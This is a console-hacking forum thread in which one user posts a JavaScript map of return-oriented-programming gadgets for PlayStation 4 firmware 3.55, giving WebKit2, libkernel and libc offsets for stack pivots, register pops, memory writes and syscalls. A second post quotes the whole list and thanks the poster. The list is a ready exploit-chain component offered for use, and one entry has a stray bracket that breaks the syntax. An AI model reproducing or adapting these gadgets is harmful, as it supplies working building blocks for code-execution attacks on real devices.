PS4 3.55 Updated and More Extensive Gadget List Code from Dragood2

[Snow DF Member Posts:35 Threads:27 Reputation 0]

PS4 3.55 Updated and More Extensive Gadget List

Code:

gadgetMap = {
 'PlayStation 4 3.55': {
   'xchg rax, rsp; dec dword ptr [rax - 0x77]': new gadget(VTABLE, -0x18a353f),
   'pop rcx; pop rcx': new gadget(VTABLE, -0x5e970c),
   'add dword ptr [rax - 0x77], ecx': new gadget(VTABLE, -0x18c3d40),
   'mov qword ptr [rdi], rax': new gadget(VTABLE, -0x2372c99),
   'syscall': new gadget(VTABLE, -0x3dc1a6),
   'mov rax, qword ptr [rax]': new gadget(VTABLE, -0x238e98d),
 
// 1.76 gadgets updated with 3.55 locations
   'pop rbp': new gadget(WEBKIT2, 0x2177),
   'pop rax': new gadget(WEBKIT2, 0x1c6ab),
   'pop rcx': new gadget([WEBKIT2, 0x3ca71b),
   'pop rdx': new gadget(WEBKIT2, 0x1afa),
   'pop rsi': new gadget(WEBKIT2, 0xb9ebb),
   'pop rdi': new gadget(WEBKIT2, 0x113991),
   'pop r8': new gadget(WEBKIT2, 0x1c6aa),
   'pop r9': new gadget(WEBKIT2, 0xee0a8f),
   'pop rsp': new gadget(WEBKIT2, 0x376850),

   'mov r10, rcx; syscall': new gadget(LIBKERNEL, 0x4b7),
   'mov [rax+0x1e8], rdx': new gadget(LIBKERNEL, 0x2032),

//  'mov [rax+0x60], rdi': new gadget([0x48, 0x89, 0x78, 0x60], WEBKIT2, 0x2b7274),-----------------------------------------missing
//   mov qword [rax+0x60], rdi ; ret ; -------------------------------------------------------------------------------------missing

   'mov [rax+0x8], rsi': new gadget(WEBKIT2, 0x5af574),
//  'mov [rax+0xc0], rcx': new gadget([0x48, 0x89, 0x88, 0xc0, 0x00, 0x00, 0x00], WEBKIT2, 0x369e6d), ----------------------- missing
   'mov [rax], rcx': new gadget(WEBKIT2, 0x1129eee),
//  'mov [rax], rdx': new gadget([0x48, 0x89, 0x10], WEBKIT2, 0x3579c0), ------------------------------------missing
   'mov [rax], rsi': new gadget(WEBKIT2, 0x3d7a87),

   'mov [rax], dh': new gadget( WEBKIT2, 0x215ca8),

   'mov [rcx], rax': new gadget(WEBKIT2, 0x225814),
   'mov [rcx], rdx': new gadget(WEBKIT2, 0xbde080),

   'mov [rdx], rcx': new gadget(WEBKIT2, 0x40c889),
   'mov [rdx], rsi': new gadget(WEBKIT2, 0xf64a0f),

   'mov [rsi+0x18], rax': new gadget(WEBKIT2, 0x681f7),
   'mov [rsi+0x8], r8': new gadget(WEBKIT2, 0x25b67a),
   'mov [rsi], rcx': new gadget(WEBKIT2, 0x12390),

   'mov [rdi], rax': new gadget(WEBKIT2, 0x11fc37),
//  'mov [rdi+0x88], rax': new gadget([0x48, 0x89, 0x87, 0x88, 0x00, 0x00, 0x00], WEBKIT2, 0x1c0e03),------------------ missing
//  'mov [rdi+0xa0], rcx': new gadget([0x48, 0x89, 0x8f, 0xa0, 0x00, 0x00, 0x00], WEBKIT2, 0xb6b5),---------------------missing
   'mov [rdi+0x80], rdx': new gadget(WEBKIT2, 0x1153d24),
   'mov [rdi+0x80], rsi': new gadget(WEBKIT2, 0x3dc290),
//  'mov [rdi+0x20], r8': new gadget([0x4c, 0x89, 0x47, 0x20], 12, 0x40415),--------------------------------------------missing
   'mov [rdi+0x20], rdx': new gadget(WEBKIT2, 0xb610b),

//  'mov [r10], rdi': new gadget([0x49, 0x89, 0x3a], 16, 0x1ba44), -----------------------------------------------------missing
//  'mov [r10], rdx': new gadget([0x49, 0x89, 0x12], 16, 0x1b79b), -----------------------------------------------------missing
//  'mov [r10], rsi': new gadget([0x49, 0x89, 0x32], 16, 0x1b8cd), -----------------------------------------------------missing

   'mov rdi, [rdi+0x48]': new gadget(LIBC, 0x8e982),
   'mov rsi, rax; jmp rcx': new gadget(WEBKIT2, 0x1ac260),

//  'mov rax, [rax+0x830]': new gadget([0x48, 0x8b, 0x80, 0x30, 0x08, 0x00, 0x00], 19, 0x1957),-------------------------missing
   'mov rax, [rdi]': new gadget(WEBKIT2, 0xa0450),
   'mov rax, [rdi+0x18]': new gadget(WEBKIT2, 0x131000),
//  'mov rax, [r10]': new gadget([0x49, 0x8b, 0x02], 16, 0xd93d),-------------------------------------------------------missing
//  'mov rax, [r11]': new gadget([0x49, 0x8b, 0x03], 16, 0xd936),-------------------------------------------------------missing

   'mov rdx, [rdi+0x8]': new gadget(LIBC, 0x6973),

   'mov rax, rdi': new gadget(LIBC, 0x9480),
   'mov rax, rsi': new gadget(LIBC, 0xc3b4),
   'mov rax, r8': new gadget(LIBC, 0x70738),

   'mov rdx, rdi': new gadget(LIBC, 0x8a7f),

   'add ah, byte [rax]': new gadget(WEBKIT2, 0xf36798),
   'add edi, dword [rcx]': new gadget(WEBKIT2, 0xfcbffd),

   'call rax': new gadget(LIBKERNEL, 0x72),
   'call rbx': new gadget(LIBC, 0x9c50),
   'call rcx': new gadget(LIBC, 0x2f05),
   'call rdx': new gadget(LIBC, 0x9d5c9),
   'call rsi': new gadget(LIBC, 0x9d7d),

   'jmp rax': new gadget(LIBC, 0x92),
   'jmp rbx': new gadget(LIBC, 0x222f5),
   'jmp rcx': new gadget(LIBC, 0xb7cc),
   'jmp rdx': new gadget(LIBC, 0xb81c),

   'ret': new gadget(WEBKIT2, 0x1d0f),
 },

[Red Painting the town Red Posts:3,756 Threads:228 Reputation 92]

PS4 3.55 Updated and More Extensive Gadget List

Code:

gadgetMap = {
 'PlayStation 4 3.55': {
   'xchg rax, rsp; dec dword ptr [rax - 0x77]': new gadget(VTABLE, -0x18a353f),
   'pop rcx; pop rcx': new gadget(VTABLE, -0x5e970c),
   'add dword ptr [rax - 0x77], ecx': new gadget(VTABLE, -0x18c3d40),
   'mov qword ptr [rdi], rax': new gadget(VTABLE, -0x2372c99),
   'syscall': new gadget(VTABLE, -0x3dc1a6),
   'mov rax, qword ptr [rax]': new gadget(VTABLE, -0x238e98d),
 
// 1.76 gadgets updated with 3.55 locations
   'pop rbp': new gadget(WEBKIT2, 0x2177),
   'pop rax': new gadget(WEBKIT2, 0x1c6ab),
   'pop rcx': new gadget([WEBKIT2, 0x3ca71b),
   'pop rdx': new gadget(WEBKIT2, 0x1afa),
   'pop rsi': new gadget(WEBKIT2, 0xb9ebb),
   'pop rdi': new gadget(WEBKIT2, 0x113991),
   'pop r8': new gadget(WEBKIT2, 0x1c6aa),
   'pop r9': new gadget(WEBKIT2, 0xee0a8f),
   'pop rsp': new gadget(WEBKIT2, 0x376850),

   'mov r10, rcx; syscall': new gadget(LIBKERNEL, 0x4b7),
   'mov [rax+0x1e8], rdx': new gadget(LIBKERNEL, 0x2032),

//  'mov [rax+0x60], rdi': new gadget([0x48, 0x89, 0x78, 0x60], WEBKIT2, 0x2b7274),-----------------------------------------missing
//   mov qword [rax+0x60], rdi ; ret ; -------------------------------------------------------------------------------------missing

   'mov [rax+0x8], rsi': new gadget(WEBKIT2, 0x5af574),
//  'mov [rax+0xc0], rcx': new gadget([0x48, 0x89, 0x88, 0xc0, 0x00, 0x00, 0x00], WEBKIT2, 0x369e6d), ----------------------- missing
   'mov [rax], rcx': new gadget(WEBKIT2, 0x1129eee),
//  'mov [rax], rdx': new gadget([0x48, 0x89, 0x10], WEBKIT2, 0x3579c0), ------------------------------------missing
   'mov [rax], rsi': new gadget(WEBKIT2, 0x3d7a87),

   'mov [rax], dh': new gadget( WEBKIT2, 0x215ca8),

   'mov [rcx], rax': new gadget(WEBKIT2, 0x225814),
   'mov [rcx], rdx': new gadget(WEBKIT2, 0xbde080),

   'mov [rdx], rcx': new gadget(WEBKIT2, 0x40c889),
   'mov [rdx], rsi': new gadget(WEBKIT2, 0xf64a0f),

   'mov [rsi+0x18], rax': new gadget(WEBKIT2, 0x681f7),
   'mov [rsi+0x8], r8': new gadget(WEBKIT2, 0x25b67a),
   'mov [rsi], rcx': new gadget(WEBKIT2, 0x12390),

   'mov [rdi], rax': new gadget(WEBKIT2, 0x11fc37),
//  'mov [rdi+0x88], rax': new gadget([0x48, 0x89, 0x87, 0x88, 0x00, 0x00, 0x00], WEBKIT2, 0x1c0e03),------------------ missing
//  'mov [rdi+0xa0], rcx': new gadget([0x48, 0x89, 0x8f, 0xa0, 0x00, 0x00, 0x00], WEBKIT2, 0xb6b5),---------------------missing
   'mov [rdi+0x80], rdx': new gadget(WEBKIT2, 0x1153d24),
   'mov [rdi+0x80], rsi': new gadget(WEBKIT2, 0x3dc290),
//  'mov [rdi+0x20], r8': new gadget([0x4c, 0x89, 0x47, 0x20], 12, 0x40415),--------------------------------------------missing
   'mov [rdi+0x20], rdx': new gadget(WEBKIT2, 0xb610b),

//  'mov [r10], rdi': new gadget([0x49, 0x89, 0x3a], 16, 0x1ba44), -----------------------------------------------------missing
//  'mov [r10], rdx': new gadget([0x49, 0x89, 0x12], 16, 0x1b79b), -----------------------------------------------------missing
//  'mov [r10], rsi': new gadget([0x49, 0x89, 0x32], 16, 0x1b8cd), -----------------------------------------------------missing

   'mov rdi, [rdi+0x48]': new gadget(LIBC, 0x8e982),
   'mov rsi, rax; jmp rcx': new gadget(WEBKIT2, 0x1ac260),

//  'mov rax, [rax+0x830]': new gadget([0x48, 0x8b, 0x80, 0x30, 0x08, 0x00, 0x00], 19, 0x1957),-------------------------missing
   'mov rax, [rdi]': new gadget(WEBKIT2, 0xa0450),
   'mov rax, [rdi+0x18]': new gadget(WEBKIT2, 0x131000),
//  'mov rax, [r10]': new gadget([0x49, 0x8b, 0x02], 16, 0xd93d),-------------------------------------------------------missing
//  'mov rax, [r11]': new gadget([0x49, 0x8b, 0x03], 16, 0xd936),-------------------------------------------------------missing

   'mov rdx, [rdi+0x8]': new gadget(LIBC, 0x6973),

   'mov rax, rdi': new gadget(LIBC, 0x9480),
   'mov rax, rsi': new gadget(LIBC, 0xc3b4),
   'mov rax, r8': new gadget(LIBC, 0x70738),

   'mov rdx, rdi': new gadget(LIBC, 0x8a7f),

   'add ah, byte [rax]': new gadget(WEBKIT2, 0xf36798),
   'add edi, dword [rcx]': new gadget(WEBKIT2, 0xfcbffd),

   'call rax': new gadget(LIBKERNEL, 0x72),
   'call rbx': new gadget(LIBC, 0x9c50),
   'call rcx': new gadget(LIBC, 0x2f05),
   'call rdx': new gadget(LIBC, 0x9d5c9),
   'call rsi': new gadget(LIBC, 0x9d7d),

   'jmp rax': new gadget(LIBC, 0x92),
   'jmp rbx': new gadget(LIBC, 0x222f5),
   'jmp rcx': new gadget(LIBC, 0xb7cc),
   'jmp rdx': new gadget(LIBC, 0xb81c),

   'ret': new gadget(WEBKIT2, 0x1d0f),
 },

Thanks for sharing this code man, I appreciate it!